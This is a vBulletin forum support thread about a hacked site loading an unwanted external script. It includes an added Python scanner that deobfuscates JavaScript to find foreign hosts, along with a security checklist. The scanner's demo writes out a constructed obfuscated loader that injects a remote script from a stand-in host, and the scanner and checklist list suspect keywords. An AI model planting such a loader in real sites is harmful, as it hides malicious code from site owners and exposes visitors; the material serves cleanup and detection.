View Full Version : VB4 links to strange external urls


popup
04-06-2014, 07:45 PM
My vBulletin forum has been hacked before. Now it works fine, but I see that all pages spend a lot of time fetching some unwanted statistics URLs.
I have disabled all plugins and base64_decode, but the bad GETs are still there.
I searched for the URLs in all of the VB files and in the database but could not find any of them.
I appreciate your hints to find and remove the sites.

Lynne
04-06-2014, 07:49 PM
I am not understanding the problem. Can you link us to it? Or can you give us an image?

popup
04-06-2014, 08:06 PM
Here I have attached the network connections with the unwanted links.
I have also noticed that when I turn off JavaScript, the request to the remote URL, and hence the delay, disappears.

Lynne
04-07-2014, 02:22 AM
So you have something on your site that is calling some javascript you don't want it to call? Have you looked in your page source to see where it is - where is it? Are you using a totally default style?

popup
04-07-2014, 03:26 PM
That's right, Lynne. However, I could not find any weird script containing the URL in the source of the page, nor in clientscripts. Can it be encrypted somehow, and if so, how do I detect it?
I am using a slightly modified template based on the default style.
I should also mention that the site has been defaced a while ago but I managed to remove all the traces of base64_decode injected to the template table.

ForceHSS
04-07-2014, 03:37 PM
Do you have a Thanks plugin installed, or have you removed one at some point?

popup
04-07-2014, 04:54 PM
@ForceHSS. Yes, I have the Thanks plugin. I have installed and re-installed it several times during upgrades, etc. Now, whether or not it is enabled, I get the 3rd-party URL GET anyway.
Why?

Lynne
04-07-2014, 07:53 PM
Your clientscript/vbulletin-core.js file has been hacked (could be others also, but definitely that one). I'd suggest downloading a fresh set of files from the members area and uploading them to your site. Then, you really need to get your site secured.

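The question above of how a URL can hide from a search of the page source and of the clientscript files deserves a concrete answer. The following is an added example, not code from the thread, from vBulletin or from anyone posting here: it walks a vBulletin tree, undoes the cheap string encodings an injected loader typically uses (hex and unicode escapes, String.fromCharCode, base64 literals, 'a'+'b' concatenation) and reports every .js file that references a host other than the forum's own. The directory layout, the hostnames and the appended loader are constructed for this example.

```python
import base64
import os
import re
import tempfile

# Plain URL, plus the tricks that keep a hostname out of a grep. All of these
# patterns are this example's own choices, not anything vBulletin ships.
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?:/[^\s'\"<>)]*)?")
HEX_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")
UNI_RE = re.compile(r"\\u([0-9A-Fa-f]{4})")
FROMCC_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
B64_RE = re.compile(r"(['\"])([A-Za-z0-9+/]{16,}={0,2})\1")
CONCAT_RE = re.compile(r"(['\"])\s*\+\s*\1")
SUSPECT_CALLS = ("eval(", "unescape(", "document.write(", "atob(")


def _decode_b64(m):
    """Replace a quoted base64 literal with its decoded text if that text is printable."""
    try:
        decoded = base64.b64decode(m.group(2), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return m.group(0)
    return m.group(1) + decoded + m.group(1) if decoded.isprintable() else m.group(0)


def deobfuscate(text):
    """Undo the encodings above so a hidden URL becomes one plain string literal."""
    text = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = UNI_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = FROMCC_RE.sub(
        lambda m: "'" + "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()) + "'",
        text,
    )
    text = B64_RE.sub(_decode_b64, text)
    return CONCAT_RE.sub("", text)  # 'http://'+'stats' -> 'http://stats'


def find_foreign_urls(text, own_host):
    """URLs in the decoded text whose host is not the forum's own host."""
    urls = set()
    for m in URL_RE.finditer(deobfuscate(text)):
        host = m.group(0).split("/")[2].lower()
        if host != own_host.lower():
            urls.add(m.group(0))
    return sorted(urls)


def scan_tree(root, own_host):
    """Map each .js file under root that references a foreign host to its
    decoded URLs and to any suspect calls the raw file makes."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                text = fh.read()
            urls = find_foreign_urls(text, own_host)
            if urls:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits[rel] = {"urls": urls, "calls": [c for c in SUSPECT_CALLS if c in text]}
    return hits


def demo():
    """Constructed demo: one clean file and one with an appended loader whose
    hostname is built from hex escapes and fromCharCode, so a grep for the
    hostname finds nothing, which is the symptom reported in the thread."""
    root = tempfile.mkdtemp()
    js = os.path.join(root, "clientscript")
    os.makedirs(js)
    clean = "function vB_Ajax(){ return 'http://forum.example.org/ajax.php'; }\n"
    loader = (
        "var s=document.createElement('script');"
        "s.src='\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f'+String.fromCharCode(115,116,97,116,115)"
        "+'.example.net/c.js';document.head.appendChild(s);\n"
    )
    with open(os.path.join(js, "vbulletin-ajax.js"), "w") as fh:
        fh.write(clean)
    with open(os.path.join(js, "vbulletin-core.js"), "w") as fh:
        fh.write(clean + loader)
    return scan_tree(root, "forum.example.org")


if __name__ == "__main__":
    for path, info in demo().items():
        print(path, info)
```

Point scan_tree at the forum's web root with its real hostname; a hit in clientscript/ is the file to overwrite from a fresh download, and a hit that reappears after overwriting points at a writable-directory or credential problem rather than at the file itself.
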
popup
04-07-2014, 07:58 PM
You are amazing, Lynne! I just copied a fresh vbulletin-core.js to clientscripts and the bad delay is gone.
What should I do to avoid this happening again?
Thanks a lot for your valuable hint.

Lynne
04-07-2014, 08:24 PM
This is copied from a post Wayne Luke had made about securing your site.

***
There are four steps to securing your site. If you don't do them all, or you do them in the wrong order, then you're still susceptible to being attacked again.

Close the hole...
This has three subparts in this instance.
1. Delete your install folder
2. Review your admin users and delete any that don't belong. Don't ban them. Don't make them regular users. Delete them.
3. Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.

Fill the Hole...
There are seven subparts in this instance.
1. Review your files for changes. You can do this under Maintenance -> Diagnostics.
2. Delete any Suspect Files.
3. Replace any files marked as "Does not contain expected contents"
4. Scan your plugins for malicious code (exec, base64, system, pass_thru, iframe are all suspect keywords). Delete any you find.
5. Repair any templates. Any templates that you don't have notes on changing, you need to revert. If you're using a custom style, it is best to delete your existing style and reimport from a fresh download.
6. Update your Addon Products.
7. Rebuild your datastores. You can use tools.php in the "do not upload" folder to do this. Upload it to your admincp directory, delete when done.

Secure the Hole
Parts of this were done by closing the hole but there are still things to do here.
1. Keep notes of all changes you make to the system - what templates and phrases you change, what files belong to which addons, what plugins do the addons install.
2. Consider using a separate Super Admin who has access to admin logs in the AdminCP. There should be only one Super Admin.
3. Create a lower permission Administrator for every day use.
4. Review your permissions in the system.
5. Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.
6. Move your attachments outside the forum root directory.
7. Create a complete backup of your site. Make database backups weekly.

Vigilance
You need to keep active on the security of the site.
1. Give out the fewest permissions necessary for anyone to do their job
2. Make sure your hosting provider updates the software.
3. Update to the latest vBulletin when it is released.
4. Make sure your addons are always up to date.

popup
04-24-2014, 05:42 AM
Lynne, I've noticed that the bad url calls still happen when I go to admincp (which I've renamed).

I also copied fresh *.js into clientscripts but the problem persists. Do you have any ideas about this?
Thanks

Lynne
04-24-2014, 04:22 PM
I would suggest reuploading a full set of fresh files downloaded from the members area.